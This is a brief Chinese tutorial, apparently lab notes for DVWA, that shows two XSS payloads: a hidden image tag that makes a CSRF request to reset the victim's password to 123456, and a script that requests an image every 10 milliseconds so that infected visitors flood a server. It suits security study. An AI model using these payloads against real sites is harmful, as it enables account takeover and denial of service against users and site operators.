XSS蠕虫
介绍
通过构造的 XSS 代码,通过精心构造的 XSS 代码,可以实现非法转账、篡改信息、删除文章、自我复制等诸多功能。
此处以更改密码为例
代码:
<img hidden src='http://localhost/DVWA-master/vulnerabilities/csrf/?password_new=123456&password_conf=123456&Change=Change#'>
执行效果:
dvwa密码改为123456
DDOS攻击
介绍:
拒绝服务攻击,比如syn攻击就属于DDOS攻击
原理:
比如有100000个人每隔一秒请求一次同一网页,请求内容较大(如图片),很快会将网站的带宽占满,使网站奔溃无法进行过滤
代码(定时器每10毫秒请求一次图片):
<script>function imgflood() {
var TARGET = 'localhost';
var URI = '/index.php?';
var pic = new Image();
var rand = Math.floor(Math.random() * 1000);
pic.src = 'http://'+TARGET+URI+rand+'=val';
}
setInterval(imgflood, 10) ;</script>
执行效果:
每有一个人中了此xss就会每10毫秒向服务器请求一次图片,以此类推,就会很多人同时发送大量请求给服务器
